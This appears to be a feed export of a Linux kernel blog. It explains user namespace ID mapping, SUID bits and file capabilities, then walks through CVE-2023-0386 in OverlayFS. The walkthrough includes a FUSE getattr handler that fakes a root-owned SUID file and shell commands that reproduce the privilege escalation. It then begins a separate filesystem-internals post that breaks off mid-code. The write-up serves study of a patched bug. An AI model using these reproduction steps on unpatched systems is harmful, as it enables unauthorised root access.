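<p>With the single entry <code class="language-plaintext highlighter-rouge">{0, 1000, 1}</code>, looking up parent UID <code class="language-plaintext highlighter-rouge">1000</code> yields <code class="language-plaintext highlighter-rouge">0</code>, while any other parent UID falls through to the overflow ID. An empty mapping, as right after unsharing, maps nothing at all.</p>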

<p>When writing mapping entries to <code class="language-plaintext highlighter-rouge">/proc/&lt;pid&gt;/uid_map</code>, <code class="language-plaintext highlighter-rouge">proc_uid_map_write()</code> is triggered. It parses the input data and converts it into internal structures. Finally, the new mapping (<code class="language-plaintext highlighter-rouge">new_map.extent</code>) is copied to <code class="language-plaintext highlighter-rouge">ns-&gt;uid_map</code>, completing the idmap setup.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proc_uid_map_write(file, buf, size, ppos)
=&gt; map_write(file, buf, size, ppos, CAP_SETUID, &amp;ns-&gt;uid_map, &amp;ns-&gt;parent-&gt;uid_map)
  =&gt; extent.first = simple_strtoul(pos, &amp;pos, 10)
  =&gt; extent.lower_first = simple_strtoul(pos, &amp;pos, 10)
  =&gt; extent.count = simple_strtoul(pos, &amp;pos, 10)
  =&gt; insert_extent(&amp;new_map, &amp;extent)
    =&gt; dest = &amp;map-&gt;extent[map-&gt;nr_extents]
    =&gt; *dest = *extent
  
  =&gt; new_idmap_permitted(file, map_ns, cap_setid, &amp;new_map)

  =&gt; memcpy(map-&gt;extent, new_map.extent, new_map.nr_extents * sizeof(new_map.extent[0]))
  =&gt; map-&gt;nr_extents = new_map.nr_extents
</code></pre></div></div>

<p>At first glance, this mechanism may appear fragile since the user can manipulate the mapping. In practice, however, <code class="language-plaintext highlighter-rouge">new_idmap_permitted()</code> strictly validates all entries, including a capability check and a check that the requested UID range is permitted.</p>

<p><br /></p>

<p>To summarize the idmap mechanism, let’s go back to <code class="language-plaintext highlighter-rouge">make_vfsuid()</code>, which we mentioned in the last section. It is used to map a KUID (the UID stored in the <code class="language-plaintext highlighter-rouge">inode</code> object) to a UID in the corresponding user namespace.</p>

<p>The inverse function is <code class="language-plaintext highlighter-rouge">from_vfsuid()</code>. It is used to map a UID in the user namespace back to the real UID (the UID in the initial user namespace).</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>  +----------------+        +----------------+
  | inode-&gt;i_uid   |        | target user ns |
  | (init user ns) |        |                |
  |                |        |                |
  |       1000     |        |        0       |
  +--------+-------+        +--------+-------+
           |                         |
           | make_vfsuid()           | from_vfsuid()           path
           v                         v                           |
        +------------- idmap ------------+                       | (mnt)
        |    ns_uid  host_uid  range     |                       v
        |       0      1000      1       |   &lt;-------------  vfsmount
        |  (first) (lower_first) (count) |     (mnt_idmap)
        +--------------------------------+
           |                         |
           v                         v
           0                        1000
</code></pre></div></div>

<h3 id="23-suid">2.3. SUID</h3>

<p>Some of the kernel mechanisms can grant files special permissions; one of the most common is the SUID bit.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">chmod </span>u+s ./file
</code></pre></div></div>

<p>In fact, both the SUID and SGID bits are <strong>stored in <code class="language-plaintext highlighter-rouge">inode-&gt;i_mode</code></strong> as bit flags: <code class="language-plaintext highlighter-rouge">S_ISUID</code> (<code class="language-plaintext highlighter-rouge">0004000</code>) and <code class="language-plaintext highlighter-rouge">S_ISGID</code> (<code class="language-plaintext highlighter-rouge">0002000</code>).</p>

<p>Internally, the <code class="language-plaintext highlighter-rouge">chmod</code> syscall invokes the <code class="language-plaintext highlighter-rouge">.setattr</code> handler of the inode (<code class="language-plaintext highlighter-rouge">inode-&gt;i_op-&gt;setattr</code>) and updates the <code class="language-plaintext highlighter-rouge">inode-&gt;i_mode</code> with the new mode value.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_chmod
=&gt; do_fchmodat(AT_FDCWD, filename, mode, 0)
  =&gt; user_path_at(dfd, filename, lookup_flags, &amp;path)
  =&gt; chmod_common(&amp;path, mode)
    =&gt; notify_change(mnt_idmap(path-&gt;mnt), path-&gt;dentry, &amp;newattrs, &amp;delegated_inode)
      =&gt; may_setattr(idmap, inode, ia_valid)
      =&gt; inode-&gt;i_op-&gt;setattr(idmap, dentry, attr)
        =&gt; ...
        =&gt; mode = attr-&gt;ia_mode
        =&gt; inode-&gt;i_mode = mode
</code></pre></div></div>

<p>These two bits are retrieved when an executable is run. The <code class="language-plaintext highlighter-rouge">execve</code> syscall invokes <code class="language-plaintext highlighter-rouge">bprm_creds_from_file()</code> to handle the <strong>process credentials</strong>. It then calls <code class="language-plaintext highlighter-rouge">bprm_fill_uid()</code> to check the file’s SUID bit. If the kernel detects that the SUID bit is set, it retrieves <code class="language-plaintext highlighter-rouge">inode-&gt;i_uid</code>, maps it to a KUID, and finally <strong>assigns it to the <code class="language-plaintext highlighter-rouge">cred</code> object (<code class="language-plaintext highlighter-rouge">bprm-&gt;cred-&gt;euid</code>)</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bprm_creds_from_file(bprm)
=&gt; file = bprm-&gt;execfd_creds ? bprm-&gt;executable : bprm-&gt;file

=&gt; bprm_fill_uid(bprm, file)
  =&gt; inode = file_inode(file)
  =&gt; ...
  =&gt; vfsuid = i_uid_into_vfsuid(idmap, inode)
  =&gt; bprm-&gt;cred-&gt;euid = vfsuid_into_kuid(vfsuid)

=&gt; security_bprm_creds_from_file(bprm, file)
</code></pre></div></div>

<h3 id="24-capability">2.4. Capability</h3>

<p>File capabilities are another mechanism that lets a user grant an executable higher privileges.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>setcap cap_setuid+ep ./test
</code></pre></div></div>

<p>These capabilities are actually stored as <strong>extended attributes (EAs)</strong>. When the kernel detects that the EA name is <strong><code class="language-plaintext highlighter-rouge">"security.capability"</code></strong>, it first calls <code class="language-plaintext highlighter-rouge">cap_convert_nscap()</code> to verify whether the process has sufficient privileges to set capabilities on the file. It then invokes the filesystem’s set handler (<code class="language-plaintext highlighter-rouge">handler-&gt;set</code>) to <strong>persistently store the EA</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_setxattr(dfd, pathname, at_flags, name, uargs, usize)
=&gt; path_setxattrat(AT_FDCWD, pathname, 0, name, value, size, flags)
  =&gt; setxattr_copy(name, &amp;ctx)
    =&gt; import_xattr_name(ctx-&gt;kname, name)
    =&gt; ctx-&gt;kvalue = vmemdup_user(ctx-&gt;cvalue, ctx-&gt;size)

  =&gt; filename_setxattr(dfd, filename, lookup_flags, &amp;ctx)
    =&gt; filename_lookup(dfd, filename, lookup_flags, &amp;path, NULL)
    =&gt; do_setxattr(file_mnt_idmap(f), f-&gt;f_path.dentry, ctx)
      =&gt; vfs_setxattr(idmap, dentry, ctx-&gt;kname-&gt;name, ctx-&gt;kvalue, ctx-&gt;size, ctx-&gt;flags)
        
        =&gt; if name == "security.capability"
          =&gt; cap_convert_nscap(idmap, dentry, &amp;value, size)
        
        =&gt; __vfs_setxattr_locked(idmap, dentry, name, value, size, flags, &amp;delegated_inode)
          =&gt; __vfs_setxattr_noperm(idmap, dentry, name, value, size, flags)
            =&gt; __vfs_setxattr(idmap, dentry, inode, name, value, size, flags)
              =&gt; handler = xattr_resolve_name(inode, &amp;name)
              =&gt; handler-&gt;set(handler, idmap, dentry, inode, name, value, size, flags)
</code></pre></div></div>

<p>Like the SUID bit, capabilities are also handled during the <code class="language-plaintext highlighter-rouge">execve</code> syscall.</p>

<p>Within <code class="language-plaintext highlighter-rouge">bprm_creds_from_file()</code>, <code class="language-plaintext highlighter-rouge">security_bprm_creds_from_file()</code> is called to handle the capability-related logic. It gets the EA named <code class="language-plaintext highlighter-rouge">"security.capability"</code> (<code class="language-plaintext highlighter-rouge">XATTR_NAME_CAPS</code>) from the executable file and <strong>updates the permitted capability set of the <code class="language-plaintext highlighter-rouge">cred</code> object</strong> (<code class="language-plaintext highlighter-rouge">new-&gt;cap_permitted</code>) based on the EA value.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bprm_creds_from_file(bprm)
=&gt; file = bprm-&gt;execfd_creds ? bprm-&gt;executable : bprm-&gt;file
=&gt; bprm_fill_uid(bprm, file)

=&gt; security_bprm_creds_from_file(bprm, file)
  =&gt; cap_bprm_creds_from_file(bprm, file)
    =&gt; get_file_caps(bprm, file, &amp;effective, &amp;has_fcap)
      =&gt; get_vfs_caps_from_disk(file_mnt_idmap(file), file-&gt;f_path.dentry, &amp;vcaps)
        =&gt; __vfs_getxattr((struct dentry *)dentry, inode, XATTR_NAME_CAPS, &amp;data, XATTR_CAPS_SZ)
        =&gt; ... set vcaps
    
      =&gt; bprm_caps_from_vfs_caps(&amp;vcaps, bprm, effective, has_fcap)
        =&gt; new = bprm-&gt;cred
        =&gt; ... set new-&gt;cap_permitted.val
</code></pre></div></div>
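<p>To make the EA value less abstract, here is a user-space sketch that decodes a revision-2 <code class="language-plaintext highlighter-rouge">"security.capability"</code> value. The constants mirror those in <code class="language-plaintext highlighter-rouge">&lt;linux/capability.h&gt;</code> but are redefined with a <code class="language-plaintext highlighter-rouge">MODEL_</code> prefix so the example stands alone. The struct and function names are hypothetical, and revision 3 (which adds a root ID) is not handled.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Values as defined in <linux/capability.h>, renamed for this model. */
#define MODEL_VFS_CAP_REVISION_MASK   0xFF000000u
#define MODEL_VFS_CAP_REVISION_2      0x02000000u
#define MODEL_VFS_CAP_FLAGS_EFFECTIVE 0x00000001u
#define MODEL_XATTR_CAPS_SZ_2         20 /* magic + 2 x (permitted, inheritable) */
#define MODEL_CAP_SETUID              7

struct model_vfs_caps {
    uint64_t permitted;
    uint64_t inheritable;
    bool effective; /* the "e" in cap_setuid+ep */
};

/* Read a little-endian 32-bit word regardless of host byte order. */
static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode a revision-2 xattr value; returns false for any other layout. */
static bool parse_vfs_caps_v2(const uint8_t *buf, size_t len,
                              struct model_vfs_caps *out)
{
    uint32_t magic;

    if (len != MODEL_XATTR_CAPS_SZ_2)
        return false;
    magic = read_le32(buf);
    if ((magic & MODEL_VFS_CAP_REVISION_MASK) != MODEL_VFS_CAP_REVISION_2)
        return false;

    out->effective = (magic & MODEL_VFS_CAP_FLAGS_EFFECTIVE) != 0;
    /* Low 32 bits come from data[0], high 32 bits from data[1]. */
    out->permitted = read_le32(buf + 4) | ((uint64_t)read_le32(buf + 12) << 32);
    out->inheritable = read_le32(buf + 8) | ((uint64_t)read_le32(buf + 16) << 32);
    return true;
}
```

<p>In a real program the buffer would come from <code class="language-plaintext highlighter-rouge">getxattr()</code> on the file. For <code class="language-plaintext highlighter-rouge">cap_setuid+ep</code>, the permitted set has only bit 7 (<code class="language-plaintext highlighter-rouge">CAP_SETUID</code>) set and the effective flag is on.</p>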

<h2 id="3-security-issues">3. Security Issues</h2>

<h3 id="cve-2023-0386-ovl-fail-on-invalid-uidgid-mapping-at-copy-up">CVE-2023-0386: ovl: fail on invalid uid/gid mapping at copy up</h3>
<blockquote>
  <p>https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4f11ada10d0ad3fd53e2bd67806351de63a4f9c3</p>
</blockquote>

<p>I think this is one of the most famous and impactful logic bugs that has occurred in filesystems in recent years.</p>

<p>This vulnerability occurs in the kernel function <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code>, which is used by OverlayFS to <strong>copy a file from a lower directory to an upper directory</strong>.</p>

<div class="language-diff highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">@@ -1011,6 +1011,10 @@</span> static int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry,
    if (err)
       return err;
 
<span class="gi">+   if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) ||
+       !kgid_has_mapping(current_user_ns(), ctx.stat.gid))
+      return -EOVERFLOW;
+
</span></code></pre></div></div>

<p>OverlayFS can be viewed as one of the core mechanisms of <strong>Docker containers</strong>, so the <a href="https://docs.docker.com/engine/storage/drivers/overlayfs-driver/">Docker documentation</a> elaborates on it in much more detail. Here, I only cover some core concepts and analyze the functions related to the vulnerability.</p>

<p><br /></p>

<p>An OverlayFS instance consists of one or more lower directories, an upper directory and a merged directory.</p>

<p>Basically, these <strong>lower directories</strong> contain files that are shared by all containers (or instances) and <strong>cannot be modified (read-only)</strong>. The <strong>merged directory</strong> is a flattened view of all lower directories. If there are conflicting files between lower directories, the one in the highest layer takes precedence.</p>

<p>If a user tries to modify an existing file or create a new one, OverlayFS copies the target file into the <strong>upper directory</strong>, or creates it there if it does not exist yet. The upper directory is writable, stores the files unique to each container, and has higher priority than all lower directories.</p>

<p>The <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code> function is used to handle the file copy <strong>from the lower directory to the upper directory</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ovl_open(inode, file)
=&gt; ovl_maybe_copy_up(dentry, file-&gt;f_flags)
  =&gt; ovl_copy_up_flags(dentry, flags)
    =&gt; ovl_copy_up_one(parent, next, flags)
</code></pre></div></div>

<p>It first gets the <code class="language-plaintext highlighter-rouge">path</code> object of the lower directory using <code class="language-plaintext highlighter-rouge">ovl_path_lower()</code> [1]. After that, <code class="language-plaintext highlighter-rouge">vfs_getattr()</code> [2] is called to retrieve the file metadata, including the UID and GID.</p>

<p>Before the patch, the kernel failed to verify whether there was <strong>a mapping between the real UID/GID and the current user namespace</strong> [3].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">ovl_copy_up_one</span><span class="p">(</span><span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">parent</span><span class="p">,</span> <span class="k">struct</span> <span class="n">dentry</span> <span class="o">*</span><span class="n">dentry</span><span class="p">,</span>
               <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">struct</span> <span class="n">path</span> <span class="n">parentpath</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="n">ovl_path_lower</span><span class="p">(</span><span class="n">dentry</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ctx</span><span class="p">.</span><span class="n">lowerpath</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">vfs_getattr</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">.</span><span class="n">lowerpath</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">ctx</span><span class="p">.</span><span class="n">stat</span><span class="p">,</span> <span class="c1">// [2]</span>
              <span class="n">STATX_BASIC_STATS</span><span class="p">,</span> <span class="n">AT_STATX_SYNC_AS_STAT</span><span class="p">);</span>

    <span class="c1">// if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) || // [3]</span>
    <span class="c1">//     !kgid_has_mapping(current_user_ns(), ctx.stat.gid))</span>
    <span class="c1">//     return -EOVERFLOW;</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>
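<p>The check added at [3] can be modeled in user space as follows. This is a sketch under simplifying assumptions: a user namespace is reduced to arrays of mapping extents, and <code class="language-plaintext highlighter-rouge">struct ns_extent</code>, <code class="language-plaintext highlighter-rouge">model_has_mapping()</code>, and <code class="language-plaintext highlighter-rouge">model_copy_up_check()</code> are hypothetical names.</p>

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* One line of a uid_map/gid_map: <first> <lower_first> <count>. */
struct ns_extent {
    uint32_t first;       /* ID inside the user namespace */
    uint32_t lower_first; /* ID in the parent (here: initial) namespace */
    uint32_t count;
};

/* Model of kuid_has_mapping()/kgid_has_mapping(). */
static bool model_has_mapping(const struct ns_extent *map, size_t n,
                              uint32_t host_id)
{
    for (size_t i = 0; i < n; i++) {
        if (host_id >= map[i].lower_first &&
            host_id - map[i].lower_first < map[i].count)
            return true;
    }
    return false;
}

/* Model of the patched check: refuse copy-up for unmapped owners. */
static int model_copy_up_check(const struct ns_extent *uid_map, size_t n_uid,
                               const struct ns_extent *gid_map, size_t n_gid,
                               uint32_t stat_uid, uint32_t stat_gid)
{
    if (!model_has_mapping(uid_map, n_uid, stat_uid) ||
        !model_has_mapping(gid_map, n_gid, stat_gid))
        return -EOVERFLOW;
    return 0;
}
```

<p>With a namespace that maps only host ID 1000 (as a single-entry map would for that user), a file owned by 1000 passes the check, while a file owned by the real root (0) is rejected with <code class="language-plaintext highlighter-rouge">-EOVERFLOW</code>.</p>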

<p>Since mounting OverlayFS requires root privileges in the current user namespace, an unprivileged process must call <code class="language-plaintext highlighter-rouge">unshare</code> to enter a new user namespace before mounting OverlayFS. Within the new user namespace, there is no mapping entry for the real root user, so the real root user is shown as <code class="language-plaintext highlighter-rouge">"nobody"</code> (<code class="language-plaintext highlighter-rouge">65534</code>) in that user namespace.</p>

<p>However, files owned by <code class="language-plaintext highlighter-rouge">"nobody"</code> are still duplicated by <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code> with <strong>all file metadata preserved</strong>.</p>

<p>We might simply pass a directory containing a SUID root executable (like <code class="language-plaintext highlighter-rouge">su</code> or <code class="language-plaintext highlighter-rouge">passwd</code>) as the lower directory and overwrite the file content after the copy. However, the write handler internally calls <code class="language-plaintext highlighter-rouge">file_remove_privs()</code> to <strong>remove the SUID bit</strong> and <strong>strip the capabilities of the file</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ovl_write_iter(iocb, iter)
=&gt; realfile = ovl_real_file(file)
=&gt; backing_file_write_iter(realfile, iter, iocb, ifl, &amp;ctx)
  =&gt; ret = file_remove_privs(iocb-&gt;ki_filp)
    =&gt; file_remove_privs_flags(file, 0)
</code></pre></div></div>

<p>So how can we create a file in the initial user namespace whose content we control, that is owned by root, and that has the SUID bit set? That’s where the <strong>FUSE filesystem</strong> comes in!</p>

<p>If we use FUSE as one of our lower directories, the filesystem implementation allows us to fully control the file <code class="language-plaintext highlighter-rouge">stat</code> return value, including <code class="language-plaintext highlighter-rouge">ctx.stat.uid</code> and <code class="language-plaintext highlighter-rouge">ctx.stat.gid</code>. We can also set the SUID bit for that file.</p>

<p>To achieve this, we define the <code class="language-plaintext highlighter-rouge">.getattr</code> handler as the <code class="language-plaintext highlighter-rouge">my_getattr()</code> function shown below in the FUSE daemon.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">my_getattr</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="k">struct</span> <span class="n">stat</span> <span class="o">*</span><span class="n">stbuf</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">stbuf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">stat</span><span class="p">));</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s">"/"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_mode</span> <span class="o">=</span> <span class="n">S_IFDIR</span> <span class="o">|</span> <span class="mo">0755</span><span class="p">;</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_nlink</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">file_path</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_mode</span> <span class="o">=</span> <span class="n">S_IFREG</span> <span class="o">|</span> <span class="mo">04777</span><span class="p">;</span> <span class="c1">// 04000 == SUID</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_nlink</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_size</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">file_content</span><span class="p">);</span>

        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_uid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// root</span>
        <span class="n">stbuf</span><span class="o">-&gt;</span><span class="n">st_gid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">// root</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
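<p>The daemon also has to serve the bytes of <code class="language-plaintext highlighter-rouge">file_content</code> when the kernel reads the file during copy-up. The post does not show that handler, so the following is only a sketch of its core logic, kept independent of libfuse. <code class="language-plaintext highlighter-rouge">serve_read()</code> is a hypothetical helper, and how it is wired into the daemon’s read handler is left as an assumption.</p>

```c
#include <string.h>
#include <sys/types.h>

/*
 * Copy up to `size` bytes of `content`, starting at `offset`, into `buf`.
 * Returns the number of bytes copied, or 0 when reading at or past the end.
 */
static int serve_read(const char *content, char *buf, size_t size, off_t offset)
{
    size_t len = strlen(content);

    if (offset < 0 || (size_t)offset >= len)
        return 0;
    if (size > len - (size_t)offset)
        size = len - (size_t)offset; /* clamp to the remaining bytes */
    memcpy(buf, content + offset, size);
    return (int)size;
}
```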

<p>After opening the target file (<code class="language-plaintext highlighter-rouge">file_path</code>), <code class="language-plaintext highlighter-rouge">ovl_copy_up_one()</code> copies it from the lower directory (FUSE) to the upper directory (ext4) while preserving the SUID bit. We can then go back to the initial user namespace and execute the SUID binary to get a root shell!</p>

<p>In fact, the reason you are allowed to mount the FUSE filesystem in the <strong>initial user namespace</strong> is that after installing the <code class="language-plaintext highlighter-rouge">libfuse-dev</code> package, the executable <code class="language-plaintext highlighter-rouge">fusermount3</code> is also installed, and it <strong>has the SUID bit</strong>! As a result, even a normal user without the <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> capability can still mount a FUSE filesystem.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt">-rwsr-xr-x</span> 1 root root 39376 Sep 21  2024 /usr/bin/fusermount3
</code></pre></div></div>

<p>However, it also appears that this vulnerability <strong>depends on external packages</strong> and cannot be exploited by default. That may be why it is not as broadly applicable as DirtyPipe or DirtyCOW.</p>

<p><br /></p>

<p>You can use the following commands to reproduce this vulnerability yourself.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">mkdir</span> <span class="nt">-p</span> overlay-test/<span class="o">{</span>lower,upper,work,merged<span class="o">}</span>
./your_fuse overlay-test/lower <span class="c"># write your fuse program with the getattr handler above</span>

unshare <span class="nt">-r</span> <span class="nt">-n</span> <span class="nt">-m</span> /bin/bash
mount <span class="nt">-t</span> overlay overlay <span class="nt">-o</span> <span class="nv">lowerdir</span><span class="o">=</span>overlay-test/lower,upperdir<span class="o">=</span>overlay-test/upper,workdir<span class="o">=</span>overlay-test/work overlay-test/merged

<span class="nb">exec </span>3&gt;&gt; overlay-test/merged/aaa <span class="c"># aaa == file_path</span>
<span class="nb">ls</span> <span class="nt">-al</span> overlay-test/upper/

<span class="c"># [output]</span>
<span class="c"># ...</span>
<span class="c"># -rwsrwxrwx 1 nobody nogroup   33 Jan  1  1970 aaa</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[In Filesystem 101, we covered the structural relationships of the Linux filesystem from a process perspective. In this post, we continue analyzing how it interacts with other kernel subsystems.]]></summary></entry><entry><title type="html">Filesystem 101</title><link href="https://u1f383.github.io/linux/2026/02/26/filesystem-101.html" rel="alternate" type="text/html" title="Filesystem 101" /><published>2026-02-26T00:00:00+00:00</published><updated>2026-02-26T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/02/26/filesystem-101</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/02/26/filesystem-101.html"><![CDATA[<p>Recently I explored the filesystem design of Linux and found it a little more complicated than I expected, so I decided to write a post organizing it. This post analyzes the filesystem from a high-level view, skipping detailed implementation. I hope that after reading it, you will understand more about the Linux filesystem.</p>

<h1 id="1-overview">1. Overview</h1>

<h2 id="11-file-dentry-and-inode">1.1. file, dentry and inode</h2>

<p>First, we start with how the simple syscall <code class="language-plaintext highlighter-rouge">open</code> works to figure out the filesystem internals.</p>

<p>When you call the <code class="language-plaintext highlighter-rouge">open</code> system call, <code class="language-plaintext highlighter-rouge">__do_sys_open()</code> is the entry point in kernel space. In <code class="language-plaintext highlighter-rouge">do_sys_openat2()</code>, the kernel gets a file descriptor, opens the file, and installs it into the process’s file table.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_open(filename, flags, mode)
=&gt; do_sys_open(AT_FDCWD, filename, flags, mode)
  =&gt; do_sys_openat2(dfd, filename, &amp;how)
    =&gt; fd = get_unused_fd_flags(how-&gt;flags)
    =&gt; f = do_filp_open(dfd, tmp, &amp;op)
    =&gt; fd_install(fd, f)
</code></pre></div></div>

<p>In <code class="language-plaintext highlighter-rouge">path_openat()</code>, the kernel allocates an empty <code class="language-plaintext highlighter-rouge">file</code> object, then resolves the pathname, and finally binds the name data (<code class="language-plaintext highlighter-rouge">nd</code>) to that <code class="language-plaintext highlighter-rouge">file</code> object by calling <code class="language-plaintext highlighter-rouge">do_open()</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>do_filp_open(dfd, pathname, op)
=&gt; set_nameidata(&amp;nd, dfd, pathname, NULL)
=&gt; path_openat(&amp;nd, op, flags | LOOKUP_RCU)
  =&gt; file = alloc_empty_file(op-&gt;open_flag, current_cred())
  
  // ========= resolution =========
  =&gt; s = path_init(nd, flags)
  =&gt; link_path_walk(s, nd)
  =&gt; s = open_last_lookups(nd, file, op)
  
  =&gt; do_open(nd, file, op)
</code></pre></div></div>

<p>The whole process raises three questions:</p>
<ol>
  <li>How does the file table work?</li>
  <li>How does the kernel resolve a pathname?</li>
  <li>How does the binding work?</li>
</ol>

<p><br /></p>

<p>The first question, <strong>“How does the file table work?”</strong>, is the easiest.</p>

<p>The purpose of the file descriptor is to let a process use a number to represent a <code class="language-plaintext highlighter-rouge">file</code> object. This implies there is an array-like structure that maintains the mapping between the number and the <code class="language-plaintext highlighter-rouge">file</code> object, and that is exactly what the <strong>file table</strong> does.</p>

<p>When calling <code class="language-plaintext highlighter-rouge">get_unused_fd_flags()</code>, the kernel gets the file table from the <strong>current process</strong> (<code class="language-plaintext highlighter-rouge">current-&gt;files</code>). It then finds an unused number and marks it as in use.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>get_unused_fd_flags(flags)
=&gt; __get_unused_fd_flags(flags, rlimit(RLIMIT_NOFILE))
  =&gt; alloc_fd(0, nofile, flags)
    =&gt; files = current-&gt;files
    =&gt; fdt = files_fdtable(files)
    =&gt; fd = find_next_fd(fdt, fd)
    =&gt; __set_open_fd(fd, fdt, flags &amp; O_CLOEXEC)
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">fd_install()</code> is quite simple. It assigns the <code class="language-plaintext highlighter-rouge">file</code> object to the file table’s fd array <code class="language-plaintext highlighter-rouge">fdt-&gt;fd[]</code>, using the pre-reserved <code class="language-plaintext highlighter-rouge">fd</code> as the index.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fd_install(fd, file)
=&gt; files = current-&gt;files
=&gt; fdt = files_fdtable(files)
=&gt; rcu_assign_pointer(fdt-&gt;fd[fd], file)
</code></pre></div></div>

<p>The next time we call any syscall that requires file operations, we just pass the file descriptor to the kernel. Then <code class="language-plaintext highlighter-rouge">fdget()</code> or similar functions are used to retrieve the corresponding <code class="language-plaintext highlighter-rouge">file</code> object.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>fdget(fd)
=&gt; __fget_light(fd, FMODE_PATH)
  =&gt; files = current-&gt;files
  =&gt; file = files_lookup_fd_raw(files, fd)
    =&gt; rcu_dereference_raw(fdt-&gt;fd[fd&amp;mask])
  =&gt; return BORROWED_FD(file)
</code></pre></div></div>
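<p>The three operations above (reserve a number, install the object, look it up later) can be modeled with a bitmap and an array. This is a user-space sketch with hypothetical names and a fixed table size; the kernel’s table grows dynamically and is protected by locking and RCU.</p>

```c
#include <stddef.h>

#define MODEL_MAX_FDS 64

/* Stand-in for the kernel's struct file. */
struct model_file {
    const char *name;
};

struct model_fdtable {
    unsigned long long open_fds;          /* bit i set => fd i is reserved */
    struct model_file *fd[MODEL_MAX_FDS]; /* fd number -> file object */
};

/* Like get_unused_fd_flags(): reserve the lowest free descriptor number. */
static int model_get_unused_fd(struct model_fdtable *fdt)
{
    for (int fd = 0; fd < MODEL_MAX_FDS; fd++) {
        if (!(fdt->open_fds & (1ULL << fd))) {
            fdt->open_fds |= 1ULL << fd;
            return fd;
        }
    }
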